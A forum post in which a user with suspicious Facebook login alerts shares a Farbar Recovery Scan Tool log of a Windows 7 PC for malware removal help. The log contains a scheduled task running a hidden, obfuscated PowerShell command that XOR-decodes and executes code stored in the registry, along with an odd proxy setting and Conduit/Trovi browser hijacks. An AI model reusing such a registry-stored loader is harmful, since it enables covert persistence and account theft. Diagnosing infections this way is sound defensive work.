Logging in to FB, windows opening in the browser

Posted: 23 Nov 2023 21:07
by mivefe5888
Hello, I have a problem: FB has already given me a login alert twice. I changed my password right away, and it still came again half an hour later. Also, some window with an ad opened in my browser once. I would like to ask for a check.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-11-2023 02
Ran by John (administrator) on JOHN-PC (23-11-2023 19:43:41)
Running from C:\Users\John\Downloads\FRST64.exe
Loaded Profiles: John
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Default browser: Opera
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe ->) (LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(C:\Program Files (x86)\Opera\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\95.0.4635.90\opera_crashreporter.exe
(C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(C:\Program Files\Sublime Text 3\sublime_text.exe ->) (Sublime HQ Pty Ltd -> ) C:\Program Files\Sublime Text 3\plugin_host.exe
(C:\Riot Games\Riot Client\RiotClientServices.exe ->) () [File not signed] C:\Riot Games\Riot Client\RiotClientCrashHandler.exe
(Discord Inc. -> Discord Inc.) C:\Users\John\AppData\Local\Discord\app-1.0.9024\Discord.exe <6>
(explorer.exe ->) () [File not signed] I:\stahovanie\gammy_v0.9.64\gammy.exe
(explorer.exe ->) (Figma, Inc. -> ) C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe
(explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <47>
(explorer.exe ->) (Johannes Millan) [File not signed] [File is in use] I:\stahovanie\superProductivity-7.12.0.exe
(explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\calc.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgtray.exe
(explorer.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Riot Games\Riot Client\RiotClientServices.exe
(explorer.exe ->) (Sublime HQ Pty Ltd -> Sublime HQ Pty Ltd) C:\Program Files\Sublime Text 3\sublime_text.exe
(explorer.exe ->) (TeamSpeak Systems GmbH -> TeamSpeak Systems GmbH) C:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe
(explorer.exe ->) (Vincent Burel -> VB-AUDIO Software) C:\Program Files (x86)\VB\Voicemeeter\voicemeeterpro.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.332\GoogleCrashHandler64.exe
(I:\stahovanie\superProductivity-7.12.0.exe ->) (Johannes Millan) [File not signed] C:\Users\John\AppData\Local\Temp\2EDNJDl4YnJmwr5naxHqvVY7EUJ\superProductivity.exe <4>
(Opera Norway AS -> Opera Software) C:\Program Files (x86)\Opera\opera.exe <54>
(services.exe ->) (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files (x86)\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService.exe
(services.exe ->) (Flexera Software LLC -> Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
(services.exe ->) (LogMeIn, Inc. -> LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
(services.exe ->) (Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\alg.exe
(services.exe ->) (Riot Games, Inc. -> Riot Games, Inc.) C:\Program Files\Riot Vanguard\vgc.exe
(services.exe ->) (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(services.exe ->) (SolidWorks) [File not signed] C:\Program Files (x86)\Common Files\SOLIDWORKS Shared\Service\SolidWorksLicensing.exe
(services.exe ->) (South River Technologies -> South River Technologies, Inc.) C:\Program Files\WebDrive\wdService.exe
(services.exe ->) (Synology Inc. -> ) C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe
(services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(services.exe ->) (Tonalio GmbH -> Sandboxie-Plus.com) D:\windows programy\Sandboxie-Plus\SbieSvc.exe
(services.exe ->) (Trace Software International -> ) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe
(services.exe ->) (VMware, Inc. -> ) C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(services.exe ->) (VMware, Inc. -> VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [3089288 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [Figma Agent] => C:\Users\John\AppData\Local\FigmaAgent\figma_agent.exe [6795040 2023-10-31] (Figma, Inc. -> )
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\...\Run: [RiotClient] => C:\Riot Games\Riot Client\RiotClientServices.exe [70912472 2023-11-16] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM\...\Windows x64\Print Processors\Canon MG3000 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDG.DLL [30720 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Windows x64\Print Processors\Canon TS3300 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDG3.DLL [482816 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MG3000 series: C:\Windows\system32\CNMLMDG.DLL [485376 2016-05-15] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3300 series: C:\Windows\system32\CNMLMG3.DLL [1311232 2019-03-26] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\EPSON WF-2870 Series 64MonitorBE: C:\Windows\system32\E_YLMBXVE.DLL [187392 2018-06-15] (Microsoft Windows Hardware Compatibility Publisher -> Seiko Epson Corporation)
HKLM\...\Print\Monitors\HP 1853 Status Monitor: C:\Windows\system32\hpinksts1853LM.dll [467464 2019-11-28] (HP Inc -> HP Inc.)
HKLM\...\Print\Monitors\HP Discovery Port Monitor (HP DeskJet 2700 series): C:\Windows\system32\HPDiscoPM1853.dll [996512 2022-01-25] (HP Inc. -> HP Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\Installer\chrmstp.exe [2023-03-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [>{BC455173-F501-4356-804F-571FAFB6EA9A}] -> RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\Installer\chrmstp.exe [2020-11-24] (Avast Software s.r.o. -> AVAST Software)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {41D08211-8A07-4B1A-948A-B4B8BF58632A} - System32\Tasks\Robotka
Task: {AAAA1BA0-9973-47D1-B128-DD3F1CC9DEF6} - System32\Tasks\Motivacia
Task: {483F605F-4ACC-438C-A6BA-C7E06893DE4E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1552376 2022-09-26] (Adobe Inc. -> Adobe Inc.)
Task: {E064BC14-AB10-4997-B691-1589F21C0F1F} - System32\Tasks\AdobeAAMUpdater-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {A44084B5-2748-4011-95F6-DAF5403D9398} - System32\Tasks\AdobeGCInvoker-1.0-John-PC-John => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [316392 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
Task: {C826FD7A-B8B6-40D8-A041-2076C47165CA} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [4621920 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
Task: {B6215906-8048-45F1-AC2E-0D0F74C0649A} - System32\Tasks\Avast Secure Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {C2B756A2-8142-4B50-B9C0-C715DB45B991} - System32\Tasks\Avast Secure Browser Heartbeat Task (Logon) => C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe [1933408 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
Task: {0A9D12E3-3DCF-40E3-80B9-803013CD2C22} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (No File)
Task: {9D6C3930-F621-4296-A748-5865083AD527} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1741416 2020-09-22] (Avast Software s.r.o. -> Avast Software)
Task: {4D82607E-7526-4BF6-9F28-C3328EC91A74} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {6B681D84-73C0-42F0-816A-FAC346025961} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
Task: {E82B4641-76E0-465D-875B-7C8D9733E5FD} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-06] (Piriform Ltd -> Piriform Ltd)
Task: {8B006428-2138-449F-8FEF-00FD52F474FC} - System32\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {89F2385D-C566-491E-8211-929329243711} - System32\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE [680440 2017-06-07] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {6CA9BD1E-E93C-4F62-A79E-4BC1371F6109} - System32\Tasks\HPCustParticipation HP DeskJet 2700 series => C:\Program Files\HP\HP DeskJet 2700 series\Bin\HPCustPartic.exe [6732960 2022-01-25] (HP Inc. -> HP Inc.)
Task: {454DE0F3-8EFA-4669-8D0B-C409CA75EFF0} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {9254C62C-104D-473C-BB40-833CC10AD75B} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [5967976 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
Task: {571EEDE0-9D34-4AC1-9B1F-AD573C6CAC52} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {5D6BF89C-14FD-4209-BEDE-8D6B54312C30} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [315056 2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
Task: {75A225D9-05D2-41D3-89C6-7C86CBC51CBE} - System32\Tasks\Microsoft\Windows\Management\Provisioning\KE4x9F5p\4F379EE4-AF11-4D1B-8863-5E5A969FD790 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [473600 2009-07-14] (Microsoft Windows -> Microsoft Corporation) -> -WINdowstyLE hiDDEN -comMAnD "icm ([sCripTBlOCk]::creatE([sTRInG]::JoIN('', ((get-ITEmpRoPerty -PATh 'Hklm:\soFtware\GhiSlerkE4X9').'ke4X9F5' | % { [CHar]($_ -bXOr 128) }))))"
Task: {E296B281-E679-4FF5-9072-68B6B9295C53} - System32\Tasks\Microsoft\Windows\RestartManager\{369FD764-7CF1-4ad7-B1C9-2445F4CAF599} => C:\Windows\system32\rmclient.exe [16896 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {999F29AA-219C-4D8B-8489-FC171F033440} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [765888 2023-04-18] (Mozilla Corporation -> Mozilla Foundation)
Task: {47F65D7C-3405-49BE-9CB4-34FDE0AF233D} - System32\Tasks\Opera scheduled Autoupdate 1473525916 => C:\Program Files (x86)\Opera\launcher.exe [1977760 2023-10-30] (Opera Norway AS -> Opera Software)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {E68B163E-C7D5-4EDD-9994-7FE352488197}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{E68B163E-C7D5-4EDD-9994-7FE352488197} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\EPSON WF-2870 Series Update {F36A92EA-C9F5-4280-9BE4-615524B64A59}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSXVE.EXE:/EXE:{F36A92EA-C9F5-4280-9BE4-615524B64A59} /F:UpdateSYSTEMĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-949114339-2066100574-2594248327-1000] => 178.32.129.31:3128
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{54287F57-F62E-4A77-887F-98CFD53339ED}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{B1477436-BDB7-43DB-8368-4FEBFCEBABA8}: [DhcpNameServer] 192.168.0.1

Edge:
=======
Edge Profile: C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default [2023-09-05]
Edge Extension: (Edge relevant text changes) - C:\Users\John\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2023-09-05]

FireFox:
========
FF DefaultProfile: vtnva5hp.default
FF DefaultProfile: dpdx1dpi.default
FF DefaultProfile: 39pruj5d.default
FF DefaultProfile: 5fn2593k.default
FF ProfilePath: C:\Users\John\AppData\Roaming\Zotero\Zotero\Profiles\vtnva5hp.default [2023-04-16]
FF ProfilePath: C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default [2019-07-14]
FF NetworkProxy: old Mozilla\Firefox\Profiles\dpdx1dpi.default -> backup.ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\@flash_debugger.xpi [2019-07-14]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\sp@avast.com.xpi [2019-01-23]
FF Extension: (Avast Online Security) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\wrc@avast.com.xpi [2018-07-17]
FF Extension: (Video DownloadHelper) - C:\Users\John\AppData\Roaming\old Mozilla\Firefox\Profiles\dpdx1dpi.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2018-07-22]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default [2019-07-14]
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\pt428uqu.dev-edition-default\Extensions\@flash_debugger.xpi [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\old 2 Mozilla\Firefox\Profiles\39pruj5d.default [2019-07-14]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\ly01ikd2.default-release [2023-07-30]
FF NetworkProxy: Mozilla\Firefox\Profiles\ly01ikd2.default-release -> backup.ftp", "89.221.223.204"
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\5fn2593k.default [2021-06-06]
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default [2021-06-09]
FF NetworkProxy: Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default -> ftp", "127.0.0.1"
FF Extension: (Flash Debugger) - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\1jhytjt4.dev-edition-default\Extensions\@flash_debugger [2017-04-12] [Legacy]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2023-03-08] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin: @java.com/DTPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\dtplugin\npDeployJava1.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.212.2 -> C:\Program Files\Java\jre1.8.0_212\bin\plugin2\npjp2.dll [2019-07-14] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2019-07-14] (Adobe Systems Incorporated -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-12-30] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=3 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: @update.avastbrowser.com/Avast Browser;version=9 -> C:\Program Files (x86)\AVAST Software\Browser\Update\1.8.1065.0\npAvastBrowserUpdate3.dll [2020-10-26] (Avast Software s.r.o. -> AVAST Software)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2018-04-24] (Adobe Systems Incorporated -> Adobe Systems)
StartMenuInternet: Firefox-CA9422711AE1A81C - C:\Program Files\Firefox Developer Edition\firefox.exe

Chrome:
=======
CHR Profile: C:\Users\John\AppData\Local\Google\Chrome\User Data\Default [2023-11-23]
CHR HomePage: Default -> hxxp://search.conduit.com/?ctid=CT3321897&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=4&UP=SPDDB91BBD-BA11-4584-980A-F18600097BBE&SSPV=
CHR StartupUrls: Default -> "hxxp://www.trovi.com/?gd=&ctid=CT3321897&octid ... oogle.com/"
CHR Extension: (Ban Checker for Steam) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\canbadmphamemnmdfngmcabnjmjgaiki [2023-10-12]
CHR Extension: (CSS Used) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cdopjfddjlonogibjahpnmjpoangjfff [2023-04-17]
CHR Extension: (Adblock Plus - free ad blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2023-11-12]
CHR Extension: (Steam Inventory Helper) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmeakgjggjdlcpncigglobpjbkabhmjl [2023-11-22]
CHR Extension: (Avast Online Security & Privacy (BETA)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\daanglpcpkjjlkhcbladppjphglbigam [2023-01-19]
CHR Extension: (BuiltWith Technology Profiler) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dapjbgnjinbpoindlpdmhochffioedbn [2022-05-12]
CHR Extension: (Slither.io Skins, Mods, Hack & Guide) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\dggomkijbihggjgcgdbnleolpleddaid [2016-06-12]
CHR Extension: (Session Buddy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\edacconmaakjimmfgnblocblbcdcpbko [2023-11-12]
CHR Extension: (Zotero Connector) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2023-10-02]
CHR Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2023-04-30]
CHR Extension: (DarkOrbit SID Login) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgkcmijdllamjcbfeeheebbphpnbmbco [2019-07-01]
CHR Extension: (Video Downloader PLUS) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhplmmllnpjjlncfjpbbpjadoeijkogc [2020-09-29]
CHR Extension: (Word Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\fiombgjlkfpdpkbhfioofeeinbehmajg [2021-05-13]
CHR Extension: (Bad Connection Simulator) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gflankmgolakfdeiponkgmbhbhpdmjlg [2023-10-17]
CHR Extension: (Google Docs Offline) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2023-06-01]
CHR Extension: (Avast Online Security & Privacy) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2023-01-17]
CHR Extension: (Multi Session Box - Multi login any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\hojmmbfmaddjdkkcgbiipkphdcfmkhge [2021-09-04]
CHR Extension: (Stream Video Downloader) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-14]
CHR Extension: (Unseen for Facebook) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jiomcgpfgkeefipihnplhadgdoollmap [2021-01-08]
CHR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2023-07-30]
CHR Extension: (Chromebook Recovery Utility) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\jndclpdbaamdhonoechobihbbiimdgai [2022-06-02]
CHR Extension: (Application Launcher For Drive (by Google)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2023-01-26]
CHR Extension: (WebChatGPT: ChatGPT with internet access) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfemeioodjbpieminkklglpmhlngfcn [2023-11-23]
CHR Extension: (PowerPoint Online) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2020-03-24]
CHR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-19]
CHR Extension: (Twitch Now) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlmbdmpjmlijibeockamioakdpmhjnpk [2021-06-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Font Changer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\obgkjikcnonokgaiablbenkgjcdbknna [2023-06-06]
CHR Extension: (Proxy SwitchyOmega) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\padekgcemlokbadohgkifijomclgjgif [2020-12-20]
CHR Extension: (Cold Turkey Blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\pganeibhckoanndahmnfggfoeofncnii [2023-11-17]
